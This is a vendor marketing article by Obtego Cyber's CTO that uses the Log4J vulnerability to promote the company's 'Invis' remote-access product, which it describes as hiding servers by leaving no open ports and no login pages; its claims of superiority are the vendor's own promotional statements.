The Log4J Vulnerability That Didn’t Have to Exist

OBTEGO CYBER 

The Invisible Attack Surface

Bottom Line: Log4J shows us that even more secure approaches are needed to prevent Zero Day attacks. For the first time, Obtego Cyber makes your servers completely invisible. Going  beyond shrinking an attack surface, which still leaves it vulnerable, our “Invis” technology makes  the attack surface completely invisible with zero open ports and no login pages. Attackers can’t  find what they can’t see. 

Internet-facing login pages are public-facing portals where users can log in to access their  accounts on servers. From an attacker’s perspective, the login functionality is the primary barrier  to gaining an initial foothold; however, there are common vulnerabilities or misconfigurations in  login functionality that an attacker can exploit. Some of these vulnerabilities are Default  Credentials, User Enumeration, Brute-Force, Cross-Site Scripting, SQL/NoSQL/LDAP/XML  Injection, Path traversal, SYN Flood, SSL/TLS Exhaustion, and more. 

Using the newly discovered Log4J vulnerability, an attacker can execute arbitrary code on the  server by submitting a specially crafted request. The attacker can then control log messages or  log message parameters to execute arbitrary code loaded from LDAP servers when message  lookup substitution is enabled. Log4J is already being called the single largest, most critical  vulnerability of the last decade. 

To exploit the Log4J vulnerability, an attacker must first find the vulnerable server itself. But  what if attackers couldn’t see the server in the first place? The logic is straightforward; if attackers  cannot see the servers, they cannot find them, so they cannot attack them. Many security  solutions provide secure remote access. However, they all have a login page or various open  ports. Therefore, they will continue to be vulnerable to new zero-day vulnerabilities or any  misconfigurations sooner or later. 

 On the other hand, Invis, the new solution from Obtego Cyber, is the only solution that can  make the attack surface invisible. Invis is remote access software that provides policy-based  secure access to internal applications. Its gateway can be implemented on the cloud or  perimeter. Authentication occurs without a login page. Deployments by early adopters such as  MSPs have shown that there are zero open ports on the Invis gateway. Only authorized users  can see the login page of servers. Assume there are vulnerabilities or misconfigurations on the  server apps; what can attackers do when they do not have access to the servers and cannot see  them? Invis can stop attackers at the reconnaissance stage as the only solution making the  attack surface invisible instead of just shrinking it.

Invis Means Zero Open Ports

Invis has additional capabilities, such as preventing malware lateral movement from remote  devices to enterprise networks via Dynamic Micro-Segmentation. This is in addition to its ability  to make servers completely invisible with zero open ports. Using this technology, authorized  remote users can access only a single app on a single server. 

We also understand the daily operations of business cannot be slowed. Invis provides these  advanced security features without sacrificing network performance compared to other secure  remote access solutions. It deploys quickly and easily (really), requiring no modifications on the  enterprise network firewall or port forwarding on routers. 

Log4J shows that shrinking the attack surface is not enough to prevent catastrophic attacks.  Nor does shifting the attack surface from one point of vulnerability to another does not enhance  your fundamental security. It is time to alter the terms of engagement by making the attack  surface invisible so attackers can’t see your server in the first place. We look forward to sharing  more with you soon. 

 

Dr. Vahid Heydari 

CTO 

Obtego Cyber 

Vahid@obtegocyber.com